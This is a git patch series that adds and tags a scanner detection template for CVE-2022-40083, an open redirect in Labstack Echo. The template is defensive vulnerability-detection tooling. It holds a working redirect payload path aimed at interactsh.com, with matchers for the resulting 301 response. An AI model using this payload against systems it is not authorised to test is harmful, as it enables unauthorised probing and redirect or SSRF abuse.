From 38d59c31fa6e6a46a8ee9306ce953a9a2395e5f8 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Fri, 7 Oct 2022 21:41:42 +0530
Subject: [PATCH 1/3] Added CVE-2022-40083

---
 cves/2022/CVE-2022-40083.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2022/CVE-2022-40083.yaml

diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
new file mode 100644
index 00000000000..dd576199d56
--- /dev/null
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -0,0 +1,31 @@
+id: CVE-2022-40083
+
+info:
+  name: Labstack Echo < v4.9.0 - Open Redirect
+  author: pdteam
+  severity: medium
+  description: |
+    Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
+  reference:
+    - https://github.com/labstack/echo/issues/2259
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-40083
+    cwe-id: CWE-601
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}//interactsh.com%2f.."
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: location
+        words:
+          - '//interactsh.com/../'
+
+      - type: status
+        status:
+          - 301
\ No newline at end of file

From e275c207233e46ff163317945d660ab1aa5fbebf Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Fri, 7 Oct 2022 21:43:33 +0530
Subject: [PATCH 2/3] added tags

---
 cves/2022/CVE-2022-40083.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
index dd576199d56..d6effe7301b 100644
--- a/cves/2022/CVE-2022-40083.yaml
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -13,6 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2022-40083
     cwe-id: CWE-601
+  tags: cve,cve2022,redirect,labstack,echo
 
 requests:
   - method: GET
@@ -28,4 +29,4 @@ requests:
 
       - type: status
         status:
-          - 301
\ No newline at end of file
+          - 301

From 838c426330350c42daa040fa4c87c3a30d6822e0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Tue, 11 Oct 2022 15:48:48 +0530
Subject: [PATCH 3/3] Update CVE-2022-40083.yaml

---
 cves/2022/CVE-2022-40083.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-40083.yaml b/cves/2022/CVE-2022-40083.yaml
index d6effe7301b..54cdac8d578 100644
--- a/cves/2022/CVE-2022-40083.yaml
+++ b/cves/2022/CVE-2022-40083.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2022-40083
     cwe-id: CWE-601
-  tags: cve,cve2022,redirect,labstack,echo
+  tags: cve,cve2022,redirect,labstack
 
 requests:
   - method: GET